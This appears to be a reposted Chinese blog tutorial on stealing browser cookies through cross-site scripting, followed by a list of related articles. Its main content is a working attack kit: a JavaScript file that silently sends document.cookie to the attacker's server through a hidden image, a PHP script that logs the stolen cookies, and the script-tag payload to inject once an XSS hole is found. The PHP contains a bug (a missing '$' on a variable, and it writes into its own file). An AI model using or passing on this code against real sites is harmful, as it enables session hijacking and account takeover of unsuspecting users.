XSS获取cookie

最新推荐文章于 2024-01-26 17:22:50 发布
最新推荐文章于 2024-01-26 17:22:50 发布
阅读量174 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Garvey/p/6081895.html
版权

在你服务器的html目录下创建joke文件夹;

在joke文件夹中创建joke.js 和joke.php

 

joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面

joke.js代码如下:

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/joke/joke.php?joke='+encodeURIComponent(document.cookie);

 

 

joke.php解析请求里面的joke参数(即用户的cookie),然后保存起来

joke.php代码如下:

<?php
    @ini_set('display_errors',1);
    $str = $_GET['joke'];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can't write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

 

找到XSS漏洞后,输入如下内容:

<script src="http://ip/joke/joke.js"></script>

#ip为你的服务器ip

 

转载于:https://www.cnblogs.com/Garvey/p/6081895.html

ahmyp60648
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2500
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
基于dvwa的反射性xss获取cookie分享篇
weixin_47319512的博客
05-10 1366
好切回正题,这段代码的是正则表达意思就是把这些'/
简单的利用XSS获取用户cookie
shy的博客
10-25 4284
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
使用XSS漏洞获取cookies
最新发布
Decaede的博客
01-26 1061
使用XSS漏洞获取cookies
【转】XSS获取cookie的一种手段
mastergu2的博客
08-09 301
以往只是知道xss是用来弹窗的,但是作为一种危险的漏洞,它到底有什么危害呢,今天我见识了一下,感觉很强,于是在这转载一下。 原文:https://www.cnblogs.com/chyingp/archive/2013/06/06/zcool-xss.html 首先分析了下站酷的页面表现神马的,发现它是将用户输入脚本直接输出到页面,那就好办了,果断输入如下内容: <script src="http://saintcoder.duapp.com/joke/joke.js"></script&
XSS获取cookie和利用方式 (ASP版).txt
12-22
XSS获取cookie和利用方式简单方法
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
xss Cookie
10-09
3. **CSRF令牌盗用**:某些网站使用CSRF(Cross-site Request Forgery)令牌防止非预期的操作,攻击者通过XSS获取该令牌,进行非法操作。 三、案例分析 在提供的文件列表,我们可以看到以下几个可能的示例: 1....
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
XSS 盗取 Cookie 是一种常见的 XSS 攻击方式,攻击者通过在网站上注入恶意脚本,获取用户的 Cookie,从而以用户的身份访问网站。 XSS 盗取 Cookie 的流程 1. 攻击者将可以获取并发送管理员的 Cookie 的恶意 XSS ...
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4823
渗透测试-跨站脚本攻击xss获取cookie
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7073
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站插入恶意脚本,一旦用户访问该网页...
6.5 XSS 获取 Cookie 攻击
qq_55202378的博客
08-20 1455
XSS获取Cookie
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3144
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
XSS攻击——cookie
qq_46277212的博客
06-23 1882
cookie概述 cookie是一些数据,存储于用户电脑上的文本文件。当web服务器向浏览器发送web页面时,在连接关闭后,服务器不会记录用户的信息。cookie的作用就是用于解决“如何记录客户端的用户信息”。 当用户访问web页面时,用户名可以记录在cookie。 在用户下一次访问该页面时,可以在cookie读取用户访问记录。 cookie以键值对形式存储。如 username=baixiaomao; 当浏览器从服务器上请求web页面时,属于该页面的cookie会被添加到该请求。服务器端通过
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 3909
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程踩的坑。 一、在上传的时候直接上传解压好的_Blue...
获取cookie_XSS获取COOKIE
weixin_31467557的博客
01-27 1314
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车,二者不能够混淆,因为二者属于是不同的会话。HTTP...
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 8040
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
xss获取cookie攻击
07-28
回答: XSS(跨站脚本攻击)是一种攻击方式,其目的是获取用户的敏感信息,如cookie。常见的XSS攻击手段包括盗用cookie、利用植入Flash获取更高权限、以用户身份执行管理动作等。\[2\]在XSS攻击,攻击者通过在网页...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值